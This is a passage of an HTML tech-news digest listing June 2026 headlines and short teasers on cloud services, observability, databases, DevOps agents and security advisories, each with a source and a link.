        <a href="#h3-amazon-msk-express-brokers-now-support-intelligent-rebalancing-on-existing-clusters" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon MSK Express brokers now support Intelligent Rebalancing on existing clusters
        </a>
        </h3><p>Amazon MSK Provisioned clusters with Express brokers now support Intelligent Rebalancing on all existing clusters, at no additional cost. Previously available only on newly created clusters, Intellige</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/amazon-msk-express-intelligent/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-automate-scylladb-x-cloud-clusters-with-terraform" class="group relative scroll-mt-24">
        <a href="#h3-automate-scylladb-x-cloud-clusters-with-terraform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Automate ScyllaDB X Cloud Clusters with Terraform
        </a>
        </h3><p>The ScyllaDB Cloud Terraform provider gives you infrastructure-as-code control over your clusters.</p>
<p><strong>📅 Jun 16, 2026</strong> • <strong>📰 ScyllaDB Blog</strong></p>
<p><a href="https://www.scylladb.com/2026/06/16/automate-scylladb-x-cloud-clusters-with-terraform/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-observability" class="group relative scroll-mt-24">
        <a href="#h2-observability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📊 Observability
        </a>
        </h2><h3 id="h3-telemetry-that-matters-designing-sustainable-high-impact-observability-pipelines" class="group relative scroll-mt-24">
        <a href="#h3-telemetry-that-matters-designing-sustainable-high-impact-observability-pipelines" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Telemetry that matters: Designing sustainable, high-impact observability pipelines
        </a>
        </h3><p>As system architectures grow increasingly complex, the cloud-native community faces a subtle but pressing challenge: we are drowning in our own telemetry data. It is easier than ever to instrument an </p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/22/telemetry-that-matters-designing-sustainable-high-impact-observability-pipelines/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-production-ready-autonomous-incident-resolution-with-aws-devops-agent-now-ga-and-datadog-mcp-server" class="group relative scroll-mt-24">
        <a href="#h3-production-ready-autonomous-incident-resolution-with-aws-devops-agent-now-ga-and-datadog-mcp-server" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Production-Ready Autonomous Incident Resolution with AWS DevOps Agent (now GA) and Datadog MCP Server
        </a>
        </h3><p>This post was co-written with Bharadwaj Tanikella (AI/ML Product Engineering Leader) and Mohammad Jama (Product Marketing Manager) from Datadog. In December 2025, we showed how AWS DevOps Agent and Da</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 AWS DevOps Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/devops/production-ready-autonomous-incident-resolution-with-aws-devops-agent-now-ga-and-datadog-mcp-server/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-cloudwatch-synthetics-now-supports-multilocation-canaries" class="group relative scroll-mt-24">
        <a href="#h3-amazon-cloudwatch-synthetics-now-supports-multilocation-canaries" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon CloudWatch Synthetics now supports multilocation canaries
        </a>
        </h3><p>Today, Amazon CloudWatch Synthetics announces support for multilocation canaries, allowing developers and site reliability engineers to run the same canary across multiple AWS Regions simultaneously f</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/amazon-cloudwatch-synthetics-multilocation/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-why-launchdarkly-is-standardizing-on-new-relic" class="group relative scroll-mt-24">
        <a href="#h3-why-launchdarkly-is-standardizing-on-new-relic" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why LaunchDarkly is Standardizing on New Relic
        </a>
        </h3><p>Today, we are announcing that LaunchDarkly is officially moving its primary observability and telemetry workloads to New Relic.</p>
<p><strong>📅 Jun 16, 2026</strong> • <strong>📰 LaunchDarkly Blog</strong></p>
<p><a href="https://launchdarkly.com/blog/why-launchdarkly-is-standardizing-on-new-relic/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-security" class="group relative scroll-mt-24">
        <a href="#h2-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔐 Security
        </a>
        </h2><h3 id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="group relative scroll-mt-24">
        <a href="#h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Threats Making WAVs - Incident Response to a Cryptomining Attack
        </a>
        </h3><p>Guardicore security researchers describe and uncover a full analysis of a cryptomining attack, which hid a cryptominer inside WAV files. The report includes the full attack vectors, from detection, in</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/threats-making-wavs-incident-reponse-cryptomining-attack"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-modernize-with-confidence-how-red-hat-consulting-de-risks-your-linux-transition" class="group relative scroll-mt-24">
        <a href="#h3-modernize-with-confidence-how-red-hat-consulting-de-risks-your-linux-transition" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Modernize with confidence: How Red Hat Consulting de-risks your Linux transition
        </a>
        </h3><p>Operating an unsupported or outdated Linux distribution can expose your organization to critical security risks, drive up maintenance costs, and keep you from using the newest and best tools. However,</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/migrate-confidence-how-red-hat-consulting-de-risks-your-linux-transition"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-from-sandbox-to-scale-10-ways-red-hat-is-accelerating-enterprise-it" class="group relative scroll-mt-24">
        <a href="#h3-from-sandbox-to-scale-10-ways-red-hat-is-accelerating-enterprise-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From sandbox to scale: 10 ways Red Hat is accelerating enterprise IT
        </a>
        </h3><p>Enterprise organizations are pushing past initial AI experimentation, shifting priorities from testing isolated models to safely deploying governable, production-ready workflows across the open hybrid</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/sandbox-scale-10-ways-red-hat-accelerating-enterprise-it"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-a-public-sentry-key-is-all-it-takes-to-hijack-claude-code-cursor-and-codex" class="group relative scroll-mt-24">
        <a href="#h3-a-public-sentry-key-is-all-it-takes-to-hijack-claude-code-cursor-and-codex" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 A public Sentry key is all it takes to hijack Claude Code, Cursor, and Codex
        </a>
        </h3><p>On June 17, the Threat Labs team at Tenet Security, an AI-agent security startup newly out of stealth, documented an</p>
<p><strong>📅 Jun 21, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/agentjacking-sentry-mcp-attack/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gitea-1263-and-1264-are-released" class="group relative scroll-mt-24">
        <a href="#h3-gitea-1263-and-1264-are-released" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Gitea 1.26.3 and 1.26.4 are released
        </a>
        </h3><p>We are excited to announce the release of Gitea 1.26.3 and Gitea 1.26.4. Version 1.26.3 delivers a large set of security fixes alongside important bug fixes and stability improvements. Version 1.26.4 </p>
<p><strong>📅 Jun 21, 2026</strong> • <strong>📰 Gitea Blog</strong></p>
<p><a href="https://blog.gitea.com/release-of-1.26.3-and-1.26.4"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pgadmin-4-v916-released" class="group relative scroll-mt-24">
        <a href="#h3-pgadmin-4-v916-released" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 pgAdmin 4 v9.16 Released
        </a>
        </h3><p>The pgAdmin Development Team is pleased to announce the release of pgAdmin 4 version 9.16. This release of pgAdmin 4 includes 64 bug fixes and new features, including fixes for seven security vulnerab</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pgadmin-4-v916-released-3324/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-red-hat-lightspeed-on-premise-delivers-infrastructure-intelligence-inside-your-firewall" class="group relative scroll-mt-24">
        <a href="#h3-red-hat-lightspeed-on-premise-delivers-infrastructure-intelligence-inside-your-firewall" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Red Hat Lightspeed on premise delivers infrastructure intelligence inside your firewall
        </a>
        </h3><p>Many organizations now operate under strict data governance requirements—whether driven by the EU’s General Data Protection Regulation (GDPR), Digital Operational Resilience Act (DORA), or NIS2 direct</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/red-hat-lightspeed-premise-delivers-infrastructure-intelligence-inside-your-firewall"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-build-your-own-vulnerability-harness" class="group relative scroll-mt-24">
        <a href="#h3-build-your-own-vulnerability-harness" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Build your own vulnerability harness
        </a>
        </h3><p>We break down the technical architecture behind our multi-stage vulnerability discovery harness and automated triage loop. Learn how we manage state controls, squash false positives through adversaria</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 Cloudflare Blog</strong></p>
<p><a href="https://blog.cloudflare.com/build-your-own-vulnerability-harness/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-full-snyk-ai-security-platform-free-for-open-source-maintainers" class="group relative scroll-mt-24">
        <a href="#h3-the-full-snyk-ai-security-platform-free-for-open-source-maintainers" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The full Snyk AI Security Platform, free for open source maintainers
        </a>
        </h3><p>Open source maintainers are drowning in real vulnerability reports and need help prioritizing, fixing, and shipping remediation faster. Snyk’s Secure Developer Program gives qualifying projects free a</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/secure-developer-program/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-a-day-in-the-life-of-an-ai-engineer-in-snyks-lisbon-office" class="group relative scroll-mt-24">
        <a href="#h3-a-day-in-the-life-of-an-ai-engineer-in-snyks-lisbon-office" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 A Day in the Life of an AI Engineer in Snyk's Lisbon Office
        </a>
        </h3><p>Explore a day in the life of an AI Engineer at Snyk&#39;s Lisbon office. See what it&#39;s like building AI-powered security tools, collaborating globally, and enjoying the vibrant culture of Portugal&#39;s capit</p>
<p><strong>📅 Jun 16, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/a-day-in-the-life-of-an-ai-engineer-in-snyks-lisbon-office/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-databases" class="group relative scroll-mt-24">
        <a href="#h2-databases" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          💾 Databases
        </a>
        </h2><h3 id="h3-yugabytedb-the-data-backbone-for-thousands-of-agents" class="group relative scroll-mt-24">
        <a href="#h3-yugabytedb-the-data-backbone-for-thousands-of-agents" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 YugabyteDB: The Data Backbone for Thousands of Agents
        </a>
        </h3><p>YugabyteDB 2026.1 introduces a PostgreSQL database for every agent. This blog covers how to make that vision a reality. Discover how to get started on YugabyteDB AMP (Agentic Multitenant PostgreSQL) a</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Yugabyte Blog</strong></p>
<p><a href="https://www.yugabyte.com/blog/data-backbone-for-thousands-of-agents/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-new-postgres-language-server-postgres-lsp" class="group relative scroll-mt-24">
        <a href="#h3-new-postgres-language-server-postgres-lsp" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 New Postgres Language Server: postgres-lsp
        </a>
        </h3><p>Built on tree-sitter-postgres, postgres-lsp implements the Language Server Protocol for PostgreSQL SQL and PL/pgSQL. Point your editor at it for .sql files and get diagnostics, navigation, completion,</p>
<p><strong>📅 Jun 21, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/new-postgres-language-server-postgres-lsp-3322/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-hypopg-143-is-out" class="group relative scroll-mt-24">
        <a href="#h3-hypopg-143-is-out" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 HypoPG 1.4.3 is out!
        </a>
        </h3><p>Taipei, Taiwan - Sat 20 Jun HypoPG 1.4.3 I&#39;m pleased to announce the release of the version 1.4.3 of HypoPG, an extension adding support for Hypothetical Indexes, compatible with PostgreSQL 9.2 and ab</p>
<p><strong>📅 Jun 20, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/hypopg-143-is-out-3326/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-a-postgresql-database-for-every-agent" class="group relative scroll-mt-24">
        <a href="#h3-a-postgresql-database-for-every-agent" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 A PostgreSQL Database for Every Agent
        </a>
        </h3><p>Newly released YugabyteDB 2026.1 and YugabyteDB AMP (Agentic Multitenant Postgres) provide true serverless, scale-to-zero PostgreSQL, where every agent gets its own real, isolated database starting at</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 Yugabyte Blog</strong></p>
<p><a href="https://www.yugabyte.com/blog/a-postgresql-database-for-every-agent/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pgfmt-21-in-place-formatting-and-pg_dump-compatible-output" class="group relative scroll-mt-24">
        <a href="#h3-pgfmt-21-in-place-formatting-and-pg_dump-compatible-output" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 pgfmt 2.1: in-place formatting and pg_dump-compatible output
        </a>
        </h3><p>pgfmt 2.1 lands two headline features, plus a steady stream of formatting coverage improvements driven by libpgfmt. It is also now installable from a Homebrew tap. Install via Homebrew brew tap gmr/pg</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pgfmt-21-in-place-formatting-and-pg_dump-compatible-output-3321/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-why-a-bigger-context-window-wont-fix-your-agents-memory" class="group relative scroll-mt-24">
        <a href="#h3-why-a-bigger-context-window-wont-fix-your-agents-memory" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why a bigger context window won't fix your agent's memory
        </a>
        </h3><p>Context windows have grown fast. Models that once capped out at a few thousand tokens now advertise hundreds of thousands, and the natural assumption was that the agent memory problem would shrink as </p>
<p><strong>📅 Jun 17, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/why-bigger-context-window-wont-fix-agent-memory/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-retrieval-vs-memory-in-ai-agents-why-context-layers-need-both" class="group relative scroll-mt-24">
        <a href="#h3-retrieval-vs-memory-in-ai-agents-why-context-layers-need-both" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Retrieval vs. memory in AI agents: why context layers need both
        </a>
        </h3><p>A returning user asks your agent why their bill doubled this month. The agent greets them by name, pulls up last week&#39;s billing dispute, and references the workaround your team suggested. Then it conf</p>
<p><strong>📅 Jun 17, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/ai-agent-memory-vs-retrieval/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-faq-real-time-context-engine-agent-memory-and-retrieval" class="group relative scroll-mt-24">
        <a href="#h3-faq-real-time-context-engine-agent-memory-and-retrieval" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 FAQ: Real-time context engine, agent memory, and retrieval
        </a>
        </h3><p>AI agents are getting better at reasoning, planning, and using tools. But even the smartest model can give a bad answer if it has the wrong context, stale data, or too much irrelevant information. Tha</p>
<p><strong>📅 Jun 17, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/faq-real-time-context-engine-agent-memory-and-retrieval/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-platforms" class="group relative scroll-mt-24">
        <a href="#h2-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🌐 Platforms
        </a>
        </h2><h3 id="h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="group relative scroll-mt-24">
        <a href="#h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Keep Your Tech Flame Alive: Trailblazer Rachel Bayley
        </a>
        </h3><p>In this Akamai FLAME Trailblazer blog post, Rachel Bayley encourages women to step into the unknown and to be their authentic selves.</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/culture/2024/may/keep-your-tech-flame-alive-trailblazer-rachel-bayley"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-oracle-of-delphi-will-steal-your-credentials" class="group relative scroll-mt-24">
        <a href="#h3-the-oracle-of-delphi-will-steal-your-credentials" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Oracle of Delphi Will Steal Your Credentials
        </a>
        </h3><p>Our deception technology is able to reroute attackers into honeypots, where they believe that they found their real target. The attacks brute forced passwords for RDP credentials to connect to the vic</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-oracle-of-delphi-steal-your-credentials"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="group relative scroll-mt-24">
        <a href="#h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Nansh0u Campaign – Hackers Arsenal Grows Stronger
        </a>
        </h3><p>In the beginning of April, three attacks detected in the Guardicore Global Sensor Network (GGSN) caught our attention. All three had source IP addresses originating in South Africa and hosted by Volum</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-nansh0u-campaign-hackers-arsenal-grows-stronger"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-new-convergence-how-value-stream-mapping-is-rewiring-product-platform-and-devops-for-2026-and-beyond" class="group relative scroll-mt-24">
        <a href="#h3-the-new-convergence-how-value-stream-mapping-is-rewiring-product-platform-and-devops-for-2026-and-beyond" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The New Convergence: How Value Stream Mapping is Rewiring Product, Platform and DevOps for 2026 and Beyond
        </a>
        </h3><p>Value Stream Mapping (VSM) has re-emerged as the connective tissue that unifies product management, operations and architecture.</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/the-new-convergence-how-value-stream-mapping-is-rewiring-product-platform-and-devops-for-2026-and-beyond/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-retirement-of-azure-devops-issuer-in-workload-identity-federation-service-connections" class="group relative scroll-mt-24">
        <a href="#h3-retirement-of-azure-devops-issuer-in-workload-identity-federation-service-connections" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Retirement of Azure DevOps issuer in Workload identity federation service connections
        </a>
        </h3><p>We are announcing the deprecation of the Azure DevOps issuer in workload identity federation (WIF) service connections, with planned retirement on July 1, 2027. The Azure DevOps issuer uses the https:</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Azure DevOps Blog</strong></p>
<p><a href="https://devblogs.microsoft.com/devops/retirement-of-azure-devops-issuer-in-workload-identity-federation-service-connections/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-feature-flag-orchestration-with-aws-devops-agent-and-launchdarkly" class="group relative scroll-mt-24">
        <a href="#h3-feature-flag-orchestration-with-aws-devops-agent-and-launchdarkly" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Feature Flag Orchestration with AWS DevOps Agent and LaunchDarkly
        </a>
        </h3><p>Introduction Organizations that use feature flags alongside incident response tooling often connect the two manually. When an outage occurs, engineers must identify which flags are relevant, decide wh</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 AWS DevOps Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/devops/feature-flag-orchestration-with-aws-devops-agent-and-launchdarkly/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-supercharge-your-cloud-operations-with-the-kiro-power-for-aws-devops-agent" class="group relative scroll-mt-24">
        <a href="#h3-supercharge-your-cloud-operations-with-the-kiro-power-for-aws-devops-agent" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Supercharge your cloud operations with the Kiro power for AWS DevOps Agent
        </a>
        </h3><p>When an alarm fires at 2 AM, the first thing most engineers do is grep logs, check recent deployments, and trace code paths. However, the context they need — metrics, traces, topology, configurations </p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 AWS DevOps Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/devops/supercharge-your-cloud-operations-with-the-kiro-power-for-aws-devops-agent/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-accelerate-incident-resolution-with-pagerduty-and-aws-devops-agent" class="group relative scroll-mt-24">
        <a href="#h3-accelerate-incident-resolution-with-pagerduty-and-aws-devops-agent" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Accelerate Incident Resolution with PagerDuty and AWS DevOps Agent
        </a>
        </h3><p>When something breaks in production, you find out fast. Understanding why it broke, before the damage spreads, is the hard part. That is where Site Reliability Engineering (SRE) teams lose the most ti</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 AWS DevOps Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/devops/accelerate-incident-resolution-with-pagerduty-and-aws-devops-agent/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-whats-new-with-google-cloud" class="group relative scroll-mt-24">
        <a href="#h3-whats-new-with-google-cloud" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What’s new with Google Cloud
        </a>
        </h3><p>Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. Tip: Not</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-temporary-cloudflare-accounts-for-ai-agents" class="group relative scroll-mt-24">
        <a href="#h3-temporary-cloudflare-accounts-for-ai-agents" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Temporary Cloudflare Accounts for AI agents
        </a>
        </h3><p>The moment an agent needs to deploy something, it slams face-first into a wall built for humans. Today we&#39;re rolling out Temporary Accounts on Cloudflare Workers. Any agent can now run wrangler deploy</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 Cloudflare Blog</strong></p>
<p><a href="https://blog.cloudflare.com/temporary-accounts/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-announcing-the-general-availability-of-a-new-aws-local-zone-in-hanoi-vietnam" class="group relative scroll-mt-24">
        <a href="#h3-announcing-the-general-availability-of-a-new-aws-local-zone-in-hanoi-vietnam" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Announcing the general availability of a new AWS Local Zone in Hanoi, Vietnam
        </a>
        </h3><p>Today, AWS announces the general availability of a new Local Zone in Hanoi, Vietnam, bringing AWS infrastructure closer to end users. This new Local Zone is one of the first AWS Local Zones in the Asi</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/aws-local-zones-hanoi-vietnam/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-ecs-announces-faster-service-auto-scaling" class="group relative scroll-mt-24">
        <a href="#h3-amazon-ecs-announces-faster-service-auto-scaling" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon ECS announces faster service auto scaling
        </a>
        </h3><p>Amazon ECS service auto scaling now detects and responds to load changes faster with support for high resolution (20-second) metrics and metric publishing optimizations. In AWS benchmarking tests, tim</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/amazon-ecs-faster-autoscaling/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-misc" class="group relative scroll-mt-24">
        <a href="#h2-misc" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📰 Misc
        </a>
        </h2><h3 id="h3-visual-studio-code-1126" class="group relative scroll-mt-24">
        <a href="#h3-visual-studio-code-1126" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Visual Studio Code 1.126
        </a>
        </h3><p>Learn what&#39;s new in Visual Studio Code 1.126 (Insiders)</p>
<p><strong>📅 Jun 24, 2026</strong> • <strong>📰 VS Code Blog</strong></p>
<p><a href="https://code.visualstudio.com/updates/v1_126"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-we-measure-the-roi-of-jetbrains-ides" class="group relative scroll-mt-24">
        <a href="#h3-how-we-measure-the-roi-of-jetbrains-ides" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How We Measure the ROI of JetBrains IDEs
        </a>
        </h3><p>Organizations already spend hundreds of thousands of dollars on software, so it’s only natural that when they evaluate new paid tools, one question is top of mind: “Will this actually pay off?” Our RO</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/research/2026/06/how-we-measure-the-roi-of-jetbrains-ides/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ten-great-devops-job-opportunities" class="group relative scroll-mt-24">
        <a href="#h3-ten-great-devops-job-opportunities" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Ten Great DevOps Job Opportunities
        </a>
        </h3><p>DevOps.com is now providing a weekly DevOps jobs report through which opportunities for DevOps professionals will be highlighted as part of an effort to better serve our audience. Our goal in these ch</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/ten-great-devops-job-opportunities-11/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-why-every-devops-engineer-is-suddenly-learning-mcp" class="group relative scroll-mt-24">
        <a href="#h3-why-every-devops-engineer-is-suddenly-learning-mcp" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why Every DevOps Engineer is Suddenly Learning MCP
        </a>
        </h3><p>Before they were everywhere, developers spent ages stitching systems together, one by one. APIs changed everything. MCP wants to do the same for AI.</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/why-every-devops-engineer-is-suddenly-learning-mcp/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ubuntu-summit-2604-connected-by-open-source" class="group relative scroll-mt-24">
        <a href="#h3-ubuntu-summit-2604-connected-by-open-source" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Ubuntu Summit 26.04: connected by open source
        </a>
        </h3><p>What an incredible experience! Ubuntu Summit 26.04 has officially drawn to a close, but the energy from our global community is still buzzing – in the comments section, on social media, and in news re</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/ubuntu-summit-26-04-connected-by-open-source"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-nvidia-research-bets-on-code-not-tool-calls-to-fix-ai-spatial-reasoning" class="group relative scroll-mt-24">
